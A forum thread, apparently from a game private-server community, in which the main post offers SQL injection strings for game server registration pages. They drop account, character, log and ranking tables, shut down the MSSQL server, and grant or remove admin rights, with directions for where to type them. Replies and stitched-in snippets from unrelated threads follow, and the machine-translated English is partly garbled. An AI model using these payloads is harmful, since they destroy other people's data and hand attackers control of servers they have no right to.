ich hab für euch mal ein paar SQL Injection Befehle rausgesucht:
Quote:
Hier stelle ich mal eine kleine Auflistung der mir bisher bekannten Sql-Injections rein!
Quote:
';delete account_tbl;--
Löscht die Accountdatenbank
Quote:
';delete character_01_tbl;--
Löscht die Characterdatenbank
Quote:
';delete logging_01_tbl;--
Löscht die Loggdatenbank
Quote:
';delete ranking_tbl;--
Löscht die Rankingdatenbank
Quote:
';shutdown;--
Schließt die MSSQL Verbindung!
Quote:
USE [CHARACTER_01_DBF]
UPDATE CHARACTER_TBL SET m_chAuthority='Z'
WHERE m_szName='ACCOUNTID' and serverindex='01'
USE [ACCOUNT_DBF]
UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z'
WHERE account='CHARACTERNAME' and gamecode='A000'
Gibt deinen Charackter Adminrechte!
Damit kann man auch einen Admin GM oder sonstiges mit Ingamerrechten die rechte entziehen,mann muss nur jediglich die AccountID und den Characktername wissen und aus em 'Z' ein 'F' machen!
Wie das funktioniert?
Einfach den Code bei der Regristrierungsseite eingebe,wo normalerweise deine Accountid rein kommt!
Das ganze funktioniert nur, wenn die Serverbetreiber Sonderzeichen zulassen!
Das ganze wurde von Frucht auf Core geschrieben. Also Credits zu ihm!
Werde diesen Thread updaten, wenn neue bekannt sind!
English:
Quote:
Today I present a list of SQL injections!
Quote:
'; delete account_tbl ;--
Deletes the account database
Quote:
'; delete character_01_tbl, -
Deletes the character database
Quote:
'; delete logging_01_tbl, -
Clears the log database
Quote:
'; delete ranking_tbl, -
Deletes the ranking database
Quote:
'; shutdown ;--
Closes the MSSQL connection!
Quote:
USE [CHARACTER_01_DBF]
UPDATE SET CHARACTER_TBL m_chAuthority = 'Z'
WHERE m_szName = 'ACCOUNTID' and index server = '01 '
USE [ACCOUNT_DBF]
UPDATE SET ACCOUNT_TBL_DETAIL m_chLoginAuthority = 'Z'
WHERE account = 'CHARACTER NAME' and game code = 'A000'
Makes your character to the admin!
So you can also withdraw an admin or other GM Ingamerrechten with the right man only needs to know only the AccountID and Characktername and make the 'Z' a 'F'!
How does it work?
Simply enter the code in the Page tab type where normally your accountid comes in!
It works only if the Allow server operators, special symbols
The whole thing was written by fruit to score. So credits to him!
Will update this thread when new ones are announced!
das sind SQLs, also so etwas wie Batch Dateien auf Windows. Mit ihnen kannst du Servern sagen, was sie machen sollen. Da meist nur der Admin Zugriff auf die Server Database hat, kann er nur selbst Schaden verursachen.
Auf Servern, wo Sonderzeichen gesperrt sind und deine Methode angewandt wurde, geht das nicht.
ganz nett aber ich denke solche "noob" server die du da in dem text erwähnst gibt es nicht oder nur ganz wenige : ) aber dennoch ...dadurch kann mann wirklich was lernen : ) ich meine nur die leute die einen eigenen server haben ... können sicher etwas damit anfangen
mfg. Skullptura
if(strlen($username) < 4 ||
strlen($username) > 10
{
die("Dein Benutzername ist zu kurz/lang .<br>Er muss zwischen <b><u>4 und 10</u></b> Zeichen lang sein .");
}
[Release]Gm Ordner (Alle Gm Befehle) 09/10/2010 - Metin2 PServer Guides & Strategies - 7 Replies Also die meisten gucken ja hier in ElitePvpers oben in den Gm Befehle nach codes.Aber die sind nicht geordnet deshalb habe ich hier mal eienn Gm Ordner mit allen befehle.Sie sind alle geordnet:
Download:
GM_Befehle.rar ... at ul.to - Free File Hosting, Free Image Hosting, Free Music Hosting, Free Video Hosting, ...
Virusscan:
http://www.virustotal.com/file-scan/report.html?i d=6e4dd48faf2f0dd03d6e90e0a2b1ca3a5bfee0ddcd21f7fe b48a2c120f02942c-1284062018
Viel Spaß
[Release]GM Befehle verbieten 07/06/2010 - Metin2 PServer Guides & Strategies - 20 Replies Hi Comm,
ich sah gerade, dass Seedleed shcon einen Thread erstellt hat, wie man GM Codes sperrt, aber den Inhalt wieder gelöscht hat.
Nun zeige ich euch wie es geht.
Es ist eigentlich sehr simple,
ihr müsst den gm befehl in der Gamedatei suchen,
nachdem ihr das gemacht habt, setzt einfach ein
Chinesiche GM Befehle + Italian Befehle...kann nix mit anfangen vllt kriegt ihrs hin. 05/18/2009 - Metin2 Private Server - 11 Replies Blub kann damit nix anfangen villeicht wisst ihrs wenn ihr was raus habt wäre es nett wen ihrs mir per pn oder hier im Thread posten würdet bitte keine lügen oder scheiße labern sowas kann ich auf den Tod nicht ausstehen.
hauter rein Thx könnt ihr geben wenns euch geholfen hat unso...naja viel spass.
Finalmente commandi GM !! Metin2
--- GM COMMAND ---
測試的時候請& #20351;用香港龍駒 8204;試伺服器.
登入測試伺服& #22120;流程如下:
1.安裝香港龍駒 ;主程式